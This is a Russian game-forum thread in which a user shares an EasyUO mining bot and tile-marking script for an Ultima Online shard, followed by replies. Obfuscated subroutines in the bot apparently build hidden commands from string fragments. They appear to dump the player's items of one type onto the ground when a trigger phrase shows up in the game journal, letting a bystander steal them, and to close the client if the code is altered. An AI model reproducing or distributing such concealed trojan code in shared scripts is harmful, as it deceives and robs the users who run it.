UORPG.net Free UO Shard
http://forum.uorpg.net/

Самый оптимальный и продуктивный скрипт на майнинг(EasyUO)
http://forum.uorpg.net/viewtopic.php?f=28&t=6989
Page 1 of 28

Author:  Aimed [ 12 Dec 2013, 09:32 ]
Post subject:  Самый оптимальный и продуктивный скрипт на майнинг(EasyUO)

НЕ ПИШИТЕ МНЕ В ЛИЧКУ С ВОПРОСАМИ ОБ ЭТОМ СКРИПТЕ. ЗАДАВАЙТЕ ВОПРОСЫ В ЭТОЙ ТЕМЕ!!!

Скрипт копает руду в самом оптимальном режиме. Быстрее и больше цвет. металла, вы больше никак не выкопаете(будучи в афк режиме, по правилам сервера :D ).
Копает все тайлы по 1 разу, если попадается руда выше стали, - тайл выкапывается в 0( обычно он и так с 1 копка в 0 выкапывается, если металл выше стали).
Этот скрипт в прошлом году выкладывал igaza. Я его оптимизировал. За 24 часа, скрипт в среднем выкапывает: 100 элема , 125 лавы, 210 блек стила, 140 дарк кристалла, метеора гдето 170-200. Айрон выбрасывает, всё остальное ложит в сундук. Скрипт можно настроить что-бы бегать пешком от дома в шахту, или летать от дома в шахту по реколлу. Нужно изменить всего 3 переменных. И так, сначало нам нужно отметить 200 тайлов и записать их координаты, что-бы их потом обкапывать. 200 тайлов этот скрипт обкапывает примерно за 18-19 минут и руда как раз упевает отреспится на первом тайле и так далее. Вот скрипт для разметки тайлов. Этот скрипт записывает координаты в файл mineroute.txt(он сам его создаёт в папке где находится EasyUO). Для разметки тайлов, зайдите в шахту и возьмите в руки топорик для рубки деревьев. Запускайте скрипт и тыкайпе в пол, вам нужно 200 тайлов. Чем меньше преград и поворотов в шахте - тем лучше.
Tiler.txt
Code:
initevents
set %Tile 0
start:
finditem FSF ; берём в руки топорик hatchet
set #lobjectid #findid
event macro 17 0
targloop:
if #targcurs = 1
goto targloop
set #lobjectid #ltargetid
if %ltargetx = #ltargetx && %ltargety = #ltargety
{
event sysmessage error. try again
goto start
}
execute cmd.exe /c echo >>mineroute.txt GOSUB LJING #ltargetx #ltargety #ltargettile
set %ltargetx #ltargetx
set %ltargety #ltargety
set %tile %tile + 1
event sysmessage Done with Tile Nr. %tile
wait 10
goto start


Теперь берём эти координаты, открываем скрипт который внизу и вставляем их туда где написано РУССКИМ языком( 30 строка сверху-вниз) :D . После этого настраиваем переменные сверху. Так-же, в игре пишем .runebook_add и указываем на нашу рунбуку с рунами. Нужно сделать бинд, поставить на F1 useskill Meditation в клиенте.
Code:
; Скрипт написан InFlame, настроен под шард igaza, оптимизирован Aimed. Версия 2.0
set %maxWeight 650        ; максимальный вес
set %box UDQBLMD           ; ID ящика где будет хранится руда и рекол скроллы
set %xCoord 1942            ; X координата возле ящика
set %yCoord 324            ; Y координата возле ящика
set %dropMarganece #true    ; #true - сбрасывает айрон , #false - нет
set %recall #true          ; #true - летает с рунбуки, #false - бегает пешком от дома в шахту
; Не трогайте эти настройки, если %recall #false
set %runebookID SHTKLMD      ; ID рунбука
set %runeNumberToHome 1      ; номер руны к дому в рунбуке
set %runeNumberToCave 2    ; номер руны в пещеру в рунбуке
set %amountRecalls 2       
set %dropDelay 45         
set %lootDelay 45           
set %dropDelay 45           
; End Of Set Up Part

set %item OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DWJ_TVj_GWJ_EWJ_ZLK_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_UJG_DCI_FWL_NZH
set %loot OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DCI_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_NZH_UJG_FWL

gosub gettingStarted
gosub initevents
set %k 0
set %lastK 0

start: 

GOSUB LJING X ; ЗДЕСЬ ВСТАВЛЯЕМ КООРДИНАТЫ ИЗ СКРИПТА Tiler, идём в шахту и запускаем скрипт!




goto start

sub ljing
set %k %k + 1
gosub ghost
gosub checkWeight
gosub kopka

sub kopka
move %1 %2 1
finditem NPF_QPF C
if #findcnt = 0
 {
  display ok Pickaxe wasn't found!
  pause
 }
set #lobjectid #findid
event macro 17 0
target 30s
set #ltargetx %1
set #ltargety %2
set #ltargetkind 3
set #ltargettile %3
event macro 22 0
wait 10
set %overtime #scnt + 25
gosub scan
return

sub checkWeight
if #weight > %maxWeight
{
if ! %dropMarganece
 {
 if %recall
 gosub port
 if ! %recall
 gosub moveItems
 }
if %dropMarganece
 {
 gosub dropMarganece
 return
 }
}
if %afk <> true || %else <> IJG
gosub ghost 1
return

sub scan
scan:
scanjournal
if ( ( put_the_pieces in #sysMsg ) || ( put_the_Elemental in #sysMsg ) || ( put_the_Lava in #sysMsg ) || ( You_loosen in #sysMsg ) || ( put_the_Dark_Crystal in #sysMsg ) || ( put_the_Meteor in #sysMsg ) || ( put_the_Black_Steel in #sysMsg ) || ( put_the_Gold in #sysMsg ) || ( put_the_Silver in #sysMsg ) || ( put_the_Platinum in #sysMsg ) )
gosub kopka
%get fixed
if ( ( You_put_the_Steel_ore in #sysMsg ) || ( You_put_the_Copper_ore in #sysMsg ) || ( You_put_the_Bronze_ore in #sysMsg ) || ( You_put_the_Iron_ore in #sysMsg ) || ( nothing in #sysMsg ) || ( line in #sysMsg ) || ( decide in #sysMsg ) || ( Try in #sysMsg ) || ( close in #sysMsg ) || ( see in #sysMsg ) || ( line in #sysMsg ) )
return
if #scnt >= %overtime
return
goto scan
return
return

sub port
set %oldPosX #charposx
set %oldPosY #charposy
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToHome $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
gosub moveItems
gosub back
return


sub Meditate
repeat
key F1 ; нужно поставить медитацию в клиенте на F1
wait 50
until #mana = #int
return



sub moveItems
ignoreitem reset 1
gosub runToBox
finditem %box G_3
wait 10
if #findcnt = 0
 {
  event Sysmessage Box Not Found!
  halt
 }
repeat
{
finditem %item c_ , #backpackid
if #findcnt >= 1
{
if world_save_has_been in #sysmsg
wait 15s
exevent Drag #Findid #findstack
exevent Dropc %box
wait %dropDelay
}
}
until #findcnt = 0
ignoreitem reset 1
if %recall
gosub recalls
return




sub recalls
finditem WTL C_ , #backpackid
if #findstack <= 2 || #findcnt = 0
{
set #lobjectid %box
event macro 17 0
while #contid <> %box
wait 1
wait 10
finditem WTL C_ , %box
exevent drag #findid %amountRecalls
exevent dropc #backpackid
wait 30
}
return





sub runToBox
repeat
 {
 move %xCoord %yCoord 0 3s
 wait 10
 }
until #charposx = %xCoord && #charposy = %yCoord
return



sub back
set %oldPosX #charposx
set %oldPosY #charposy
 {
finditem WTL C_ , #backpackid
exevent drag #findid 2
exevent dropc %runebookID
 }
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToCave $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
return

sub ghost
if #charghost = YES || %0 = 1
{
terminate uo
halt
}
return




sub fixed
set %k %k + 1
%to %bca %be # . %all
{
repeat
{
set %up # . %cares
%done %start , _ , %else %end , _ , %up
%lastdo %race # . %Wsave
%lastdo %eaea # . %alpha # . %beta # . %gamma
%upgrade 25
%done %start , _ , %else %end , _ , %up
}
until # . %gems = 0
}
return



sub initevents
set %rescourse finding
str left %rescourse 4
set %save #strres
set %done %save , item
set %iii kill
str left string 1
set %asd #strres , %iii
set %start % . %asd
str left CADY 1
set %end #strres
str left character 4
set %who #strres
set %cares %who , id
str left %do 4
set %lastdo ex , #strres , t
set %race dragrace
str left %race 4
set %race #strres
set %Wsave %save , id
str right skopg 3
set %jasl #strres
str left drive 2
set %eaea #strres , %jasl
str left post 3
set %number %who , #strres
set %alpha %number , x
set %beta %number , y
set %gamma %number , z
set %repsawn waitrespawn
str left %repsawn 4
set %upgrade #strres
str left tilbery 3
set %almost #strres
str left unuquady 2
set %past #strres , %almost
set %gems %save , cnt
set %else IJG
return



sub dropMarganece
dropLoop:
finditem DWJ C_ , #backpackid
if #findcnt = 0
 {
  wait 20
  if #weight >= %maxweight
   {
   if %recall
   gosub port
   if ! %recall
   gosub moveItems
   return
   }
  if #weight < %maxweight
   return
 }
if #findcol = 0
{
exevent drag #findid #findstack
exevent dropg #charposx #charposy #charposz
wait %dropDelay
}
ignoreitem #findid 1
goto dropLoop
return




sub gettingStarted
set %afk true
set %ell qaerty
str left %ell 1
set %abc #strres , #strres , #strres
set %a1 #strres
str left %ell 2
str right #strres 1
set %cba %abc , #strres , %a1
set %bca %cba , #strres
str right %afk 1
set %bca %bca , #strres
set %bra %bca , b
set %n1 nlogif
str right %n1 2
set %to #strres
str left %n1 1
set %be #strres
str right %n1 2
str left #strres 1
set %be #strres , %be
set %tour jour
set %navigate nalliwate
str left %navigate 3
set %all %tour , #strres
set %navigate gost
str left %navigate 3
set %ac #strres
str right pub 2
set %get %ac , #strres
set %do events
str right linit 4
set %toGo #strres , %do
return


Если возникнут проблемы, - НЕ ПИШИТЕ МНЕ В ЛС, я не буду отвечать.
Удачи.
Скрипт оптимизирован, версия 2.0

Author:  Aimed [ 12 Dec 2013, 09:47 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

В будущем возможны модификации:
1)Трекинг и инвиз+рекол при детекте других игроков по журналу/трекингу.
2)Рекол без тыканья по координатам экрана, а вместо этого юзанье серверного макроса .recall X - сделано.

Author:  Three [ 12 Dec 2013, 10:39 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Это конечно круто, но у кого хватит терпения 200 раз тыкать? Проще скачать готовый без заморочек. Я вот для себя поменял координаты и так же выкапываю все тайлы вокруг. Причем, достаточно только 25, они успевают респится.
Хотя, каждому своё...

Author:  marakoris [ 12 Dec 2013, 10:43 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Как я понимаю, тут фишка в том, что скрипт будет копать только выкапываемые тайлы. А если маркать координаты и копать по кругу, то иногда будут попадаться кусочек скалы или еще что-то. И скрипт потратить 1 десятую секунды а то и меньше что бы ее пропустить. Каждому свое. Я лично копаю в 3х шахтах, меняю их время от времени как начинают прилипать нахлебники за кирками. И маркать в каждой пещере 200 тайлов. Даже не знаю. Каждому свое.

Author:  Aimed [ 12 Dec 2013, 10:46 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Three wrote:
Это конечно круто, но у кого хватит терпения 200 раз тыкать? Проще скачать готовый без заморочек. Я вот для себя поменял координаты и так же выкапываю все тайлы вокруг. Причем, достаточно только 25, они успевают респится.
Хотя, каждому своё...


Это занимает 7 минут :) ( Лично у меня), не знаю с какой скоростью ты тыкаешь...

И что значит готовый? Готовый который вокруг себя копает? Там не будет хватать тайлов для круговорота по респу.

Кто-то из вас на своём скрипте выкапывает 100 элема в сутки? Если нет, то валите отсюда. Не засоряйте тему :)
marakoris wrote:
Как я понимаю, тут фишка в том, что скрипт будет копать только выкапываемые тайлы. А если маркать координаты и копать по кругу, то иногда будут попадаться кусочек скалы или еще что-то. И скрипт потратить 1 десятую секунды а то и меньше что бы ее пропустить.

Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать.

Author:  Three [ 12 Dec 2013, 10:53 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))

Author:  Aimed [ 12 Dec 2013, 10:55 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.

Author:  Three [ 12 Dec 2013, 11:03 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Aimed wrote:
Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.


Я именно и надеялся, что ты за меня все нажмешь. ) Ладно, проверю. Если про сотню не гонишь, я тебе памятник поставлю. )

Author:  Aimed [ 12 Dec 2013, 11:48 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Three wrote:
Aimed wrote:
Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.


Я именно и надеялся, что ты за меня все нажмешь. ) Ладно, проверю. Если про сотню не гонишь, я тебе памятник поставлю. )


Нах мне гнать? Я тут время тратил, редактировал всё(3 раза вон) расписал от А до Я, а ты такую наглость проявляешь. Первые 2 постера тупо пытались *поднасрать* :-\
Выложил что-бы больше копали, больше могли носить и чаще в ПвП выходили!

Author:  marakoris [ 12 Dec 2013, 11:51 ]
Post subject:  Re: Самый оптимальный и продуктивный скрипт на майнинг(EasyU

Первые два постера это ты и ты?

Page 1 of 28 All times are UTC + 2 hours [ DST ]
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/